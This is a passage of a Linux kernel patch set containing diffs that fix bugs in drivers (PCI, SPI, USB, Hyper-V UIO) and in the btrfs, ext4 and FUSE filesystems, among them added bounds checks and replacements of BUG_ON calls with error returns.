+ 		size = BRIDGE_MEM_MAX;
+-		if (size > avail/8) {
+-			size = (avail+1)/8;
++		if (size > (avail - 1) / 8) {
++			size = avail / 8;
+ 			/* round size down to next power of 2 */
+ 			i = 0;
+ 			while ((size /= 2) != 0)
+diff --git a/drivers/phy/xilinx/phy-zynqmp.c b/drivers/phy/xilinx/phy-zynqmp.c
+index ac9a9124a36de..cc36fb7616ae4 100644
+--- a/drivers/phy/xilinx/phy-zynqmp.c
++++ b/drivers/phy/xilinx/phy-zynqmp.c
+@@ -847,6 +847,7 @@ static struct phy *xpsgtr_xlate(struct device *dev,
+ 	phy_type = args->args[1];
+ 	phy_instance = args->args[2];
+ 
++	guard(mutex)(&gtr_phy->phy->mutex);
+ 	ret = xpsgtr_set_lane_type(gtr_phy, phy_type, phy_instance);
+ 	if (ret < 0) {
+ 		dev_err(gtr_dev->dev, "Invalid PHY type and/or instance\n");
+diff --git a/drivers/platform/x86/dell/dell-smbios-base.c b/drivers/platform/x86/dell/dell-smbios-base.c
+index 86b95206cb1bd..6fb538a138689 100644
+--- a/drivers/platform/x86/dell/dell-smbios-base.c
++++ b/drivers/platform/x86/dell/dell-smbios-base.c
+@@ -590,7 +590,10 @@ static int __init dell_smbios_init(void)
+ 	return 0;
+ 
+ fail_sysfs:
+-	free_group(platform_device);
++	if (!wmi)
++		exit_dell_smbios_wmi();
++	if (!smm)
++		exit_dell_smbios_smm();
+ 
+ fail_create_group:
+ 	platform_device_del(platform_device);
+diff --git a/drivers/regulator/of_regulator.c b/drivers/regulator/of_regulator.c
+index cd726d4e8fbfb..1b65e5e4e40ff 100644
+--- a/drivers/regulator/of_regulator.c
++++ b/drivers/regulator/of_regulator.c
+@@ -701,3 +701,95 @@ struct regulator_dev *of_parse_coupled_regulator(struct regulator_dev *rdev,
+ 
+ 	return c_rdev;
+ }
++
++/*
++ * Check if name is a supply name according to the '*-supply' pattern
++ * return 0 if false
++ * return length of supply name without the -supply
++ */
++static int is_supply_name(const char *name)
++{
++	int strs, i;
++
++	strs = strlen(name);
++	/* string need to be at minimum len(x-supply) */
++	if (strs < 8)
++		return 0;
++	for (i = strs - 6; i > 0; i--) {
++		/* find first '-' and check if right part is supply */
++		if (name[i] != '-')
++			continue;
++		if (strcmp(name + i + 1, "supply") != 0)
++			return 0;
++		return i;
++	}
++	return 0;
++}
++
++/*
++ * of_regulator_bulk_get_all - get multiple regulator consumers
++ *
++ * @dev:	Device to supply
++ * @np:		device node to search for consumers
++ * @consumers:  Configuration of consumers; clients are stored here.
++ *
++ * @return number of regulators on success, an errno on failure.
++ *
++ * This helper function allows drivers to get several regulator
++ * consumers in one operation.  If any of the regulators cannot be
++ * acquired then any regulators that were allocated will be freed
++ * before returning to the caller.
++ */
++int of_regulator_bulk_get_all(struct device *dev, struct device_node *np,
++			      struct regulator_bulk_data **consumers)
++{
++	int num_consumers = 0;
++	struct regulator *tmp;
++	struct property *prop;
++	int i, n = 0, ret;
++	char name[64];
++
++	*consumers = NULL;
++
++	/*
++	 * first pass: get numbers of xxx-supply
++	 * second pass: fill consumers
++	 */
++restart:
++	for_each_property_of_node(np, prop) {
++		i = is_supply_name(prop->name);
++		if (i == 0)
++			continue;
++		if (!*consumers) {
++			num_consumers++;
++			continue;
++		} else {
++			memcpy(name, prop->name, i);
++			name[i] = '\0';
++			tmp = regulator_get(dev, name);
++			if (IS_ERR(tmp)) {
++				ret = -EINVAL;
++				goto error;
++			}
++			(*consumers)[n].consumer = tmp;
++			n++;
++			continue;
++		}
++	}
++	if (*consumers)
++		return num_consumers;
++	if (num_consumers == 0)
++		return 0;
++	*consumers = kmalloc_array(num_consumers,
++				   sizeof(struct regulator_bulk_data),
++				   GFP_KERNEL);
++	if (!*consumers)
++		return -ENOMEM;
++	goto restart;
++
++error:
++	while (--n >= 0)
++		regulator_put(consumers[n]->consumer);
++	return ret;
++}
++EXPORT_SYMBOL_GPL(of_regulator_bulk_get_all);
+diff --git a/drivers/spi/spi-rockchip.c b/drivers/spi/spi-rockchip.c
+index 79242dc5272de..dbefc7e77313f 100644
+--- a/drivers/spi/spi-rockchip.c
++++ b/drivers/spi/spi-rockchip.c
+@@ -976,14 +976,16 @@ static int rockchip_spi_suspend(struct device *dev)
+ {
+ 	int ret;
+ 	struct spi_controller *ctlr = dev_get_drvdata(dev);
+-	struct rockchip_spi *rs = spi_controller_get_devdata(ctlr);
+ 
+ 	ret = spi_controller_suspend(ctlr);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	clk_disable_unprepare(rs->spiclk);
+-	clk_disable_unprepare(rs->apb_pclk);
++	ret = pm_runtime_force_suspend(dev);
++	if (ret < 0) {
++		spi_controller_resume(ctlr);
++		return ret;
++	}
+ 
+ 	pinctrl_pm_select_sleep_state(dev);
+ 
+@@ -994,25 +996,14 @@ static int rockchip_spi_resume(struct device *dev)
+ {
+ 	int ret;
+ 	struct spi_controller *ctlr = dev_get_drvdata(dev);
+-	struct rockchip_spi *rs = spi_controller_get_devdata(ctlr);
+ 
+ 	pinctrl_pm_select_default_state(dev);
+ 
+-	ret = clk_prepare_enable(rs->apb_pclk);
++	ret = pm_runtime_force_resume(dev);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	ret = clk_prepare_enable(rs->spiclk);
+-	if (ret < 0)
+-		clk_disable_unprepare(rs->apb_pclk);
+-
+-	ret = spi_controller_resume(ctlr);
+-	if (ret < 0) {
+-		clk_disable_unprepare(rs->spiclk);
+-		clk_disable_unprepare(rs->apb_pclk);
+-	}
+-
+-	return 0;
++	return spi_controller_resume(ctlr);
+ }
+ #endif /* CONFIG_PM_SLEEP */
+ 
+diff --git a/drivers/staging/iio/frequency/ad9834.c b/drivers/staging/iio/frequency/ad9834.c
+index 2b4267a87e65e..89abb07092605 100644
+--- a/drivers/staging/iio/frequency/ad9834.c
++++ b/drivers/staging/iio/frequency/ad9834.c
+@@ -114,7 +114,7 @@ static int ad9834_write_frequency(struct ad9834_state *st,
+ 
+ 	clk_freq = clk_get_rate(st->mclk);
+ 
+-	if (fout > (clk_freq / 2))
++	if (!clk_freq || fout > (clk_freq / 2))
+ 		return -EINVAL;
+ 
+ 	regval = ad9834_calc_freqreg(clk_freq, fout);
+diff --git a/drivers/uio/uio_hv_generic.c b/drivers/uio/uio_hv_generic.c
+index e5789dfcaff61..d6472de1d4b09 100644
+--- a/drivers/uio/uio_hv_generic.c
++++ b/drivers/uio/uio_hv_generic.c
+@@ -104,10 +104,11 @@ static void hv_uio_channel_cb(void *context)
+ 
+ /*
+  * Callback from vmbus_event when channel is rescinded.
++ * It is meant for rescind of primary channels only.
+  */
+ static void hv_uio_rescind(struct vmbus_channel *channel)
+ {
+-	struct hv_device *hv_dev = channel->primary_channel->device_obj;
++	struct hv_device *hv_dev = channel->device_obj;
+ 	struct hv_uio_private_data *pdata = hv_get_drvdata(hv_dev);
+ 
+ 	/*
+@@ -118,6 +119,14 @@ static void hv_uio_rescind(struct vmbus_channel *channel)
+ 
+ 	/* Wake up reader */
+ 	uio_event_notify(&pdata->info);
++
++	/*
++	 * With rescind callback registered, rescind path will not unregister the device
++	 * from vmbus when the primary channel is rescinded.
++	 * Without it, rescind handling is incomplete and next onoffer msg does not come.
++	 * Unregister the device from vmbus here.
++	 */
++	vmbus_device_unregister(channel->device_obj);
+ }
+ 
+ /* Sysfs API to allow mmap of the ring buffers
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 5b761a2a87a7f..2cd780c74381e 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -1305,6 +1305,21 @@ static int dwc3_core_init(struct dwc3 *dwc)
+ 		dwc3_writel(dwc->regs, DWC3_GUCTL2, reg);
+ 	}
+ 
++	/*
++	 * STAR 9001285599: This issue affects DWC_usb3 version 3.20a
++	 * only. If the PM TIMER ECM is enabled through GUCTL2[19], the
++	 * link compliance test (TD7.21) may fail. If the ECN is not
++	 * enabled (GUCTL2[19] = 0), the controller will use the old timer
++	 * value (5us), which is still acceptable for the link compliance
++	 * test. Therefore, do not enable PM TIMER ECM in 3.20a by
++	 * setting GUCTL2[19] by default; instead, use GUCTL2[19] = 0.
++	 */
++	if (DWC3_VER_IS(DWC3, 320A)) {
++		reg = dwc3_readl(dwc->regs, DWC3_GUCTL2);
++		reg &= ~DWC3_GUCTL2_LC_TIMER;
++		dwc3_writel(dwc->regs, DWC3_GUCTL2, reg);
++	}
++
+ 	/*
+ 	 * When configured in HOST mode, after issuing U3/L2 exit controller
+ 	 * fails to send proper CRC checksum in CRC5 feild. Because of this
+diff --git a/drivers/usb/dwc3/core.h b/drivers/usb/dwc3/core.h
+index 472a6a7e1558a..251bc438bf401 100644
+--- a/drivers/usb/dwc3/core.h
++++ b/drivers/usb/dwc3/core.h
+@@ -404,6 +404,7 @@
+ 
+ /* Global User Control Register 2 */
+ #define DWC3_GUCTL2_RST_ACTBITLATER		BIT(14)
++#define DWC3_GUCTL2_LC_TIMER			BIT(19)
+ 
+ /* Global User Control Register 3 */
+ #define DWC3_GUCTL3_SPLITDISABLE		BIT(14)
+@@ -1232,6 +1233,7 @@ struct dwc3 {
+ #define DWC3_REVISION_290A	0x5533290a
+ #define DWC3_REVISION_300A	0x5533300a
+ #define DWC3_REVISION_310A	0x5533310a
++#define DWC3_REVISION_320A	0x5533320a
+ #define DWC3_REVISION_330A	0x5533330a
+ 
+ #define DWC31_REVISION_ANY	0x0
+diff --git a/drivers/usb/gadget/udc/aspeed_udc.c b/drivers/usb/gadget/udc/aspeed_udc.c
+index cedf17e38245d..1a5a1115c1d96 100644
+--- a/drivers/usb/gadget/udc/aspeed_udc.c
++++ b/drivers/usb/gadget/udc/aspeed_udc.c
+@@ -1009,6 +1009,8 @@ static void ast_udc_getstatus(struct ast_udc_dev *udc)
+ 		break;
+ 	case USB_RECIP_ENDPOINT:
+ 		epnum = crq.wIndex & USB_ENDPOINT_NUMBER_MASK;
++		if (epnum >= AST_UDC_NUM_ENDPOINTS)
++			goto stall;
+ 		status = udc->ep[epnum].stopped;
+ 		break;
+ 	default:
+diff --git a/drivers/usb/storage/uas.c b/drivers/usb/storage/uas.c
+index af619efe8eabf..b565c1eb84b3b 100644
+--- a/drivers/usb/storage/uas.c
++++ b/drivers/usb/storage/uas.c
+@@ -422,6 +422,7 @@ static void uas_data_cmplt(struct urb *urb)
+ 			uas_log_cmd_state(cmnd, "data cmplt err", status);
+ 		/* error: no data transfered */
+ 		scsi_set_resid(cmnd, sdb->length);
++		set_host_byte(cmnd, DID_ERROR);
+ 	} else {
+ 		scsi_set_resid(cmnd, sdb->length - urb->actual_length);
+ 	}
+diff --git a/fs/binfmt_elf.c b/fs/binfmt_elf.c
+index e6c9c0e084486..89e7e4826efce 100644
+--- a/fs/binfmt_elf.c
++++ b/fs/binfmt_elf.c
+@@ -1009,7 +1009,8 @@ static int load_elf_binary(struct linux_binprm *bprm)
+ 	if (elf_read_implies_exec(*elf_ex, executable_stack))
+ 		current->personality |= READ_IMPLIES_EXEC;
+ 
+-	if (!(current->personality & ADDR_NO_RANDOMIZE) && randomize_va_space)
++	const int snapshot_randomize_va_space = READ_ONCE(randomize_va_space);
++	if (!(current->personality & ADDR_NO_RANDOMIZE) && snapshot_randomize_va_space)
+ 		current->flags |= PF_RANDOMIZE;
+ 
+ 	setup_new_exec(bprm);
+@@ -1301,7 +1302,7 @@ static int load_elf_binary(struct linux_binprm *bprm)
+ 	mm->end_data = end_data;
+ 	mm->start_stack = bprm->p;
+ 
+-	if ((current->flags & PF_RANDOMIZE) && (randomize_va_space > 1)) {
++	if ((current->flags & PF_RANDOMIZE) && (snapshot_randomize_va_space > 1)) {
+ 		/*
+ 		 * For architectures with ELF randomization, when executing
+ 		 * a loader directly (i.e. no interpreter listed in ELF
+diff --git a/fs/btrfs/ctree.c b/fs/btrfs/ctree.c
+index e08688844f1e1..66d1f34c3fc69 100644
+--- a/fs/btrfs/ctree.c
++++ b/fs/btrfs/ctree.c
+@@ -324,8 +324,16 @@ static noinline int update_ref_for_cow(struct btrfs_trans_handle *trans,
+ 	}
+ 
+ 	owner = btrfs_header_owner(buf);
+-	BUG_ON(owner == BTRFS_TREE_RELOC_OBJECTID &&
+-	       !(flags & BTRFS_BLOCK_FLAG_FULL_BACKREF));
++	if (unlikely(owner == BTRFS_TREE_RELOC_OBJECTID &&
++		     !(flags & BTRFS_BLOCK_FLAG_FULL_BACKREF))) {
++		btrfs_crit(fs_info,
++"found tree block at bytenr %llu level %d root %llu refs %llu flags %llx without full backref flag set",
++			   buf->start, btrfs_header_level(buf),
++			   btrfs_root_id(root), refs, flags);
++		ret = -EUCLEAN;
++		btrfs_abort_transaction(trans, ret);
++		return ret;
++	}
+ 
+ 	if (refs > 1) {
+ 		if ((owner == root->root_key.objectid ||
+diff --git a/fs/btrfs/ctree.h b/fs/btrfs/ctree.h
+index 853b1f96b1fdc..cca1acf2e0371 100644
+--- a/fs/btrfs/ctree.h
++++ b/fs/btrfs/ctree.h
+@@ -1553,7 +1553,6 @@ struct btrfs_drop_extents_args {
+ struct btrfs_file_private {
+ 	void *filldir_buf;
+ 	u64 last_index;
+-	bool fsync_skip_inode_lock;
+ };
+ 
+ 
+diff --git a/fs/btrfs/extent-tree.c b/fs/btrfs/extent-tree.c
+index 528cd88a77fd7..0d97c8ee6b4fb 100644
+--- a/fs/btrfs/extent-tree.c
++++ b/fs/btrfs/extent-tree.c
+@@ -5141,7 +5141,15 @@ static noinline void reada_walk_down(struct btrfs_trans_handle *trans,
+ 		/* We don't care about errors in readahead. */
+ 		if (ret < 0)
+ 			continue;
+-		BUG_ON(refs == 0);
++
++		/*
++		 * This could be racey, it's conceivable that we raced and end
++		 * up with a bogus refs count, if that's the case just skip, if
++		 * we are actually corrupt we will notice when we look up
++		 * everything again with our locks.
++		 */
++		if (refs == 0)
++			continue;
+ 
+ 		if (wc->stage == DROP_REFERENCE) {
+ 			if (refs == 1)
+@@ -5200,7 +5208,7 @@ static noinline int walk_down_proc(struct btrfs_trans_handle *trans,
+ 	if (lookup_info &&
+ 	    ((wc->stage == DROP_REFERENCE && wc->refs[level] != 1) ||
+ 	     (wc->stage == UPDATE_BACKREF && !(wc->flags[level] & flag)))) {
+-		BUG_ON(!path->locks[level]);
++		ASSERT(path->locks[level]);
+ 		ret = btrfs_lookup_extent_info(trans, fs_info,
+ 					       eb->start, level, 1,
+ 					       &wc->refs[level],
+@@ -5208,7 +5216,11 @@ static noinline int walk_down_proc(struct btrfs_trans_handle *trans,
+ 		BUG_ON(ret == -ENOMEM);
+ 		if (ret)
+ 			return ret;
+-		BUG_ON(wc->refs[level] == 0);
++		if (unlikely(wc->refs[level] == 0)) {
++			btrfs_err(fs_info, "bytenr %llu has 0 references, expect > 0",
++				  eb->start);
++			return -EUCLEAN;
++		}
+ 	}
+ 
+ 	if (wc->stage == DROP_REFERENCE) {
+@@ -5224,7 +5236,7 @@ static noinline int walk_down_proc(struct btrfs_trans_handle *trans,
+ 
+ 	/* wc->stage == UPDATE_BACKREF */
+ 	if (!(wc->flags[level] & flag)) {
+-		BUG_ON(!path->locks[level]);
++		ASSERT(path->locks[level]);
+ 		ret = btrfs_inc_ref(trans, root, eb, 1);
+ 		BUG_ON(ret); /* -ENOMEM */
+ 		ret = btrfs_dec_ref(trans, root, eb, 0);
+@@ -5338,8 +5350,9 @@ static noinline int do_walk_down(struct btrfs_trans_handle *trans,
+ 		goto out_unlock;
+ 
+ 	if (unlikely(wc->refs[level - 1] == 0)) {
+-		btrfs_err(fs_info, "Missing references.");
+-		ret = -EIO;
++		btrfs_err(fs_info, "bytenr %llu has 0 references, expect > 0",
++			  bytenr);
++		ret = -EUCLEAN;
+ 		goto out_unlock;
+ 	}
+ 	*lookup_info = 0;
+@@ -5540,7 +5553,12 @@ static noinline int walk_up_proc(struct btrfs_trans_handle *trans,
+ 				path->locks[level] = 0;
+ 				return ret;
+ 			}
+-			BUG_ON(wc->refs[level] == 0);
++			if (unlikely(wc->refs[level] == 0)) {
++				btrfs_tree_unlock_rw(eb, path->locks[level]);
++				btrfs_err(fs_info, "bytenr %llu has 0 references, expect > 0",
++					  eb->start);
++				return -EUCLEAN;
++			}
+ 			if (wc->refs[level] == 1) {
+ 				btrfs_tree_unlock_rw(eb, path->locks[level]);
+ 				path->locks[level] = 0;
+diff --git a/fs/btrfs/file.c b/fs/btrfs/file.c
+index e23d178f97782..c8231677c79ef 100644
+--- a/fs/btrfs/file.c
++++ b/fs/btrfs/file.c
+@@ -1534,13 +1534,6 @@ static ssize_t btrfs_direct_write(struct kiocb *iocb, struct iov_iter *from)
+ 	if (IS_ERR_OR_NULL(dio)) {
+ 		err = PTR_ERR_OR_ZERO(dio);
+ 	} else {
+-		struct btrfs_file_private stack_private = { 0 };
+-		struct btrfs_file_private *private;
+-		const bool have_private = (file->private_data != NULL);
+-
+-		if (!have_private)
+-			file->private_data = &stack_private;
+-
+ 		/*
+ 		 * If we have a synchoronous write, we must make sure the fsync
+ 		 * triggered by the iomap_dio_complete() call below doesn't
+@@ -1549,13 +1542,10 @@ static ssize_t btrfs_direct_write(struct kiocb *iocb, struct iov_iter *from)
+ 		 * partial writes due to the input buffer (or parts of it) not
+ 		 * being already faulted in.
+ 		 */
+-		private = file->private_data;
+-		private->fsync_skip_inode_lock = true;
++		ASSERT(current->journal_info == NULL);
++		current->journal_info = BTRFS_TRANS_DIO_WRITE_STUB;
+ 		err = iomap_dio_complete(dio);
+-		private->fsync_skip_inode_lock = false;
+-
+-		if (!have_private)
+-			file->private_data = NULL;
++		current->journal_info = NULL;
+ 	}
+ 
+ 	/* No increment (+=) because iomap returns a cumulative value. */
+@@ -1795,7 +1785,6 @@ static inline bool skip_inode_logging(const struct btrfs_log_ctx *ctx)
+  */
+ int btrfs_sync_file(struct file *file, loff_t start, loff_t end, int datasync)
+ {
+-	struct btrfs_file_private *private = file->private_data;
+ 	struct dentry *dentry = file_dentry(file);
+ 	struct inode *inode = d_inode(dentry);
+ 	struct btrfs_fs_info *fs_info = btrfs_sb(inode->i_sb);
+@@ -1805,7 +1794,13 @@ int btrfs_sync_file(struct file *file, loff_t start, loff_t end, int datasync)
+ 	int ret = 0, err;
+ 	u64 len;
+ 	bool full_sync;
+-	const bool skip_ilock = (private ? private->fsync_skip_inode_lock : false);
++	bool skip_ilock = false;
++
++	if (current->journal_info == BTRFS_TRANS_DIO_WRITE_STUB) {
++		skip_ilock = true;
++		current->journal_info = NULL;
++		lockdep_assert_held(&inode->i_rwsem);
++	}
+ 
+ 	trace_btrfs_sync_file(file, datasync);
+ 
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 934e360d1aefa..e5017b2ade573 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -5890,7 +5890,7 @@ struct inode *btrfs_lookup_dentry(struct inode *dir, struct dentry *dentry)
+ 	struct inode *inode;
+ 	struct btrfs_root *root = BTRFS_I(dir)->root;
+ 	struct btrfs_root *sub_root = root;
+-	struct btrfs_key location;
++	struct btrfs_key location = { 0 };
+ 	u8 di_type = 0;
+ 	int ret = 0;
+ 
+diff --git a/fs/btrfs/transaction.h b/fs/btrfs/transaction.h
+index 970ff316069dd..8b88446df36dc 100644
+--- a/fs/btrfs/transaction.h
++++ b/fs/btrfs/transaction.h
+@@ -11,6 +11,12 @@
+ #include "delayed-ref.h"
+ #include "ctree.h"
+ 
++/*
++ * Signal that a direct IO write is in progress, to avoid deadlock for sync
++ * direct IO writes when fsync is called during the direct IO write path.
++ */
++#define BTRFS_TRANS_DIO_WRITE_STUB	((void *) 1)
++
+ enum btrfs_trans_state {
+ 	TRANS_STATE_RUNNING,
+ 	TRANS_STATE_COMMIT_START,
+diff --git a/fs/ext4/fast_commit.c b/fs/ext4/fast_commit.c
+index 19353a2f44bb3..2ef773d40ffda 100644
+--- a/fs/ext4/fast_commit.c
++++ b/fs/ext4/fast_commit.c
+@@ -353,7 +353,7 @@ void ext4_fc_mark_ineligible(struct super_block *sb, int reason, handle_t *handl
+ 		read_unlock(&sbi->s_journal->j_state_lock);
+ 	}
+ 	spin_lock(&sbi->s_fc_lock);
+-	if (sbi->s_fc_ineligible_tid < tid)
++	if (tid_gt(tid, sbi->s_fc_ineligible_tid))
+ 		sbi->s_fc_ineligible_tid = tid;
+ 	spin_unlock(&sbi->s_fc_lock);
+ 	WARN_ON(reason >= EXT4_FC_REASON_MAX);
+@@ -1235,7 +1235,7 @@ int ext4_fc_commit(journal_t *journal, tid_t commit_tid)
+ 	if (ret == -EALREADY) {
+ 		/* There was an ongoing commit, check if we need to restart */
+ 		if (atomic_read(&sbi->s_fc_subtid) <= subtid &&
+-			commit_tid > journal->j_commit_sequence)
++		    tid_gt(commit_tid, journal->j_commit_sequence))
+ 			goto restart_fc;
+ 		ext4_fc_update_stats(sb, EXT4_FC_STATUS_SKIPPED, 0, 0,
+ 				commit_tid);
+@@ -1310,7 +1310,7 @@ static void ext4_fc_cleanup(journal_t *journal, int full, tid_t tid)
+ 		list_del_init(&iter->i_fc_list);
+ 		ext4_clear_inode_state(&iter->vfs_inode,
+ 				       EXT4_STATE_FC_COMMITTING);
+-		if (iter->i_sync_tid <= tid)
++		if (tid_geq(tid, iter->i_sync_tid))
+ 			ext4_fc_reset_inode(&iter->vfs_inode);
+ 		/* Make sure EXT4_STATE_FC_COMMITTING bit is clear */
+ 		smp_mb();
+@@ -1341,7 +1341,7 @@ static void ext4_fc_cleanup(journal_t *journal, int full, tid_t tid)
+ 	list_splice_init(&sbi->s_fc_q[FC_Q_STAGING],
+ 				&sbi->s_fc_q[FC_Q_MAIN]);
+ 
+-	if (tid >= sbi->s_fc_ineligible_tid) {
++	if (tid_geq(tid, sbi->s_fc_ineligible_tid)) {
+ 		sbi->s_fc_ineligible_tid = 0;
+ 		ext4_clear_mount_flag(sb, EXT4_MF_FC_INELIGIBLE);
+ 	}
+diff --git a/fs/fuse/dev.c b/fs/fuse/dev.c
+index 96a717f73ce37..7e0d4f08a0cf5 100644
+--- a/fs/fuse/dev.c
++++ b/fs/fuse/dev.c
+@@ -476,6 +476,8 @@ static void fuse_args_to_req(struct fuse_req *req, struct fuse_args *args)
+ 	req->in.h.opcode = args->opcode;
+ 	req->in.h.nodeid = args->nodeid;
+ 	req->args = args;
++	if (args->is_ext)
++		req->in.h.total_extlen = args->in_args[args->ext_idx].size / 8;
+ 	if (args->end)
+ 		__set_bit(FR_ASYNC, &req->flags);
+ }
+@@ -1498,7 +1500,7 @@ static int fuse_notify_inval_entry(struct fuse_conn *fc, unsigned int size,
+ 	buf[outarg.namelen] = 0;
+ 
+ 	down_read(&fc->killsb);
+-	err = fuse_reverse_inval_entry(fc, outarg.parent, 0, &name);
++	err = fuse_reverse_inval_entry(fc, outarg.parent, 0, &name, outarg.flags);
+ 	up_read(&fc->killsb);
+ 	kfree(buf);
+ 	return err;
+@@ -1546,7 +1548,7 @@ static int fuse_notify_delete(struct fuse_conn *fc, unsigned int size,
+ 	buf[outarg.namelen] = 0;
+ 
+ 	down_read(&fc->killsb);
+-	err = fuse_reverse_inval_entry(fc, outarg.parent, outarg.child, &name);
++	err = fuse_reverse_inval_entry(fc, outarg.parent, outarg.child, &name, 0);
+ 	up_read(&fc->killsb);
+ 	kfree(buf);
+ 	return err;
+diff --git a/fs/fuse/dir.c b/fs/fuse/dir.c
+index 936a24b646cef..aa2be4c1ea8f2 100644
+--- a/fs/fuse/dir.c
++++ b/fs/fuse/dir.c
+@@ -470,7 +470,7 @@ static struct dentry *fuse_lookup(struct inode *dir, struct dentry *entry,
+ }
+ 
+ static int get_security_context(struct dentry *entry, umode_t mode,
+-				void **security_ctx, u32 *security_ctxlen)
++				struct fuse_in_arg *ext)
+ {
+ 	struct fuse_secctx *fctx;
+ 	struct fuse_secctx_header *header;
+@@ -517,14 +517,42 @@ static int get_security_context(struct dentry *entry, umode_t mode,
+ 
+ 		memcpy(ptr, ctx, ctxlen);
+ 	}
+-	*security_ctxlen = total_len;
+-	*security_ctx = header;
++	ext->size = total_len;
++	ext->value = header;
+ 	err = 0;
+ out_err:
+ 	kfree(ctx);
+ 	return err;
+ }
+ 
++static int get_create_ext(struct fuse_args *args, struct dentry *dentry,
++			  umode_t mode)
++{
++	struct fuse_conn *fc = get_fuse_conn_super(dentry->d_sb);
++	struct fuse_in_arg ext = { .size = 0, .value = NULL };
++	int err = 0;
++
++	if (fc->init_security)
++		err = get_security_context(dentry, mode, &ext);
++
++	if (!err && ext.size) {
++		WARN_ON(args->in_numargs >= ARRAY_SIZE(args->in_args));
++		args->is_ext = true;
++		args->ext_idx = args->in_numargs++;
++		args->in_args[args->ext_idx] = ext;
++	} else {
++		kfree(ext.value);
++	}
++
++	return err;
++}
++
++static void free_ext_value(struct fuse_args *args)
++{
++	if (args->is_ext)
++		kfree(args->in_args[args->ext_idx].value);
++}
++
+ /*
+  * Atomic create+open operation
+  *
+@@ -545,8 +573,6 @@ static int fuse_create_open(struct inode *dir, struct dentry *entry,
+ 	struct fuse_entry_out outentry;
+ 	struct fuse_inode *fi;
+ 	struct fuse_file *ff;
+-	void *security_ctx = NULL;
+-	u32 security_ctxlen;
+ 	bool trunc = flags & O_TRUNC;
+ 
+ 	/* Userspace expects S_IFREG in create mode */
+@@ -590,19 +616,12 @@ static int fuse_create_open(struct inode *dir, struct dentry *entry,
+ 	args.out_args[1].size = sizeof(outopen);
+ 	args.out_args[1].value = &outopen;
+ 
+-	if (fm->fc->init_security) {
+-		err = get_security_context(entry, mode, &security_ctx,
+-					   &security_ctxlen);
+-		if (err)
+-			goto out_put_forget_req;
+-
+-		args.in_numargs = 3;
+-		args.in_args[2].size = security_ctxlen;
+-		args.in_args[2].value = security_ctx;
+-	}
++	err = get_create_ext(&args, entry, mode);
++	if (err)
++		goto out_free_ff;
+ 
+ 	err = fuse_simple_request(fm, &args);
+-	kfree(security_ctx);
++	free_ext_value(&args);
+ 	if (err)
+ 		goto out_free_ff;
+ 
+@@ -709,8 +728,6 @@ static int create_new_entry(struct fuse_mount *fm, struct fuse_args *args,
+ 	struct dentry *d;
+ 	int err;
+ 	struct fuse_forget_link *forget;
+-	void *security_ctx = NULL;
+-	u32 security_ctxlen;
+ 
+ 	if (fuse_is_bad(dir))
+ 		return -EIO;
+@@ -725,21 +742,14 @@ static int create_new_entry(struct fuse_mount *fm, struct fuse_args *args,
+ 	args->out_args[0].size = sizeof(outarg);
+ 	args->out_args[0].value = &outarg;
+ 
+-	if (fm->fc->init_security && args->opcode != FUSE_LINK) {
+-		err = get_security_context(entry, mode, &security_ctx,
+-					   &security_ctxlen);
++	if (args->opcode != FUSE_LINK) {
++		err = get_create_ext(args, entry, mode);
+ 		if (err)
+ 			goto out_put_forget_req;
+-
+-		BUG_ON(args->in_numargs != 2);
+-
+-		args->in_numargs = 3;
+-		args->in_args[2].size = security_ctxlen;
+-		args->in_args[2].value = security_ctx;
+ 	}
+ 
+ 	err = fuse_simple_request(fm, args);
+-	kfree(security_ctx);
++	free_ext_value(args);
+ 	if (err)
+ 		goto out_put_forget_req;
+ 
+@@ -1174,7 +1184,7 @@ int fuse_update_attributes(struct inode *inode, struct file *file, u32 mask)
+ }
+ 
+ int fuse_reverse_inval_entry(struct fuse_conn *fc, u64 parent_nodeid,
+-			     u64 child_nodeid, struct qstr *name)
++			     u64 child_nodeid, struct qstr *name, u32 flags)
+ {
+ 	int err = -ENOTDIR;
+ 	struct inode *parent;
+@@ -1201,7 +1211,9 @@ int fuse_reverse_inval_entry(struct fuse_conn *fc, u64 parent_nodeid,
+ 		goto unlock;
+ 
+ 	fuse_dir_changed(parent);
+-	fuse_invalidate_entry(entry);
++	if (!(flags & FUSE_EXPIRE_ONLY))
++		d_invalidate(entry);
++	fuse_invalidate_entry_cache(entry);
+ 
+ 	if (child_nodeid != 0 && d_really_is_positive(entry)) {
+ 		inode_lock(d_inode(entry));
+diff --git a/fs/fuse/file.c b/fs/fuse/file.c
+index c996c0ef8c632..0df1311afb87d 100644
+--- a/fs/fuse/file.c
++++ b/fs/fuse/file.c
+@@ -1563,14 +1563,47 @@ static ssize_t fuse_direct_read_iter(struct kiocb *iocb, struct iov_iter *to)
+ 	return res;
+ }
+ 
++static bool fuse_direct_write_extending_i_size(struct kiocb *iocb,
++					       struct iov_iter *iter)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++
++	return iocb->ki_pos + iov_iter_count(iter) > i_size_read(inode);
++}
++
+ static ssize_t fuse_direct_write_iter(struct kiocb *iocb, struct iov_iter *from)
+ {
+ 	struct inode *inode = file_inode(iocb->ki_filp);
++	struct file *file = iocb->ki_filp;
++	struct fuse_file *ff = file->private_data;
+ 	struct fuse_io_priv io = FUSE_IO_PRIV_SYNC(iocb);
+ 	ssize_t res;
++	bool exclusive_lock =
++		!(ff->open_flags & FOPEN_PARALLEL_DIRECT_WRITES) ||
++		iocb->ki_flags & IOCB_APPEND ||
++		fuse_direct_write_extending_i_size(iocb, from);
++
++	/*
++	 * Take exclusive lock if
++	 * - Parallel direct writes are disabled - a user space decision
++	 * - Parallel direct writes are enabled and i_size is being extended.
++	 *   This might not be needed at all, but needs further investigation.
++	 */
++	if (exclusive_lock)
++		inode_lock(inode);
++	else {
++		inode_lock_shared(inode);
++
++		/* A race with truncate might have come up as the decision for
++		 * the lock type was done without holding the lock, check again.
++		 */
++		if (fuse_direct_write_extending_i_size(iocb, from)) {
++			inode_unlock_shared(inode);
++			inode_lock(inode);
++			exclusive_lock = true;
++		}
++	}
+ 
+-	/* Don't allow parallel writes to the same file */
+-	inode_lock(inode);
+ 	res = generic_write_checks(iocb, from);
+ 	if (res > 0) {
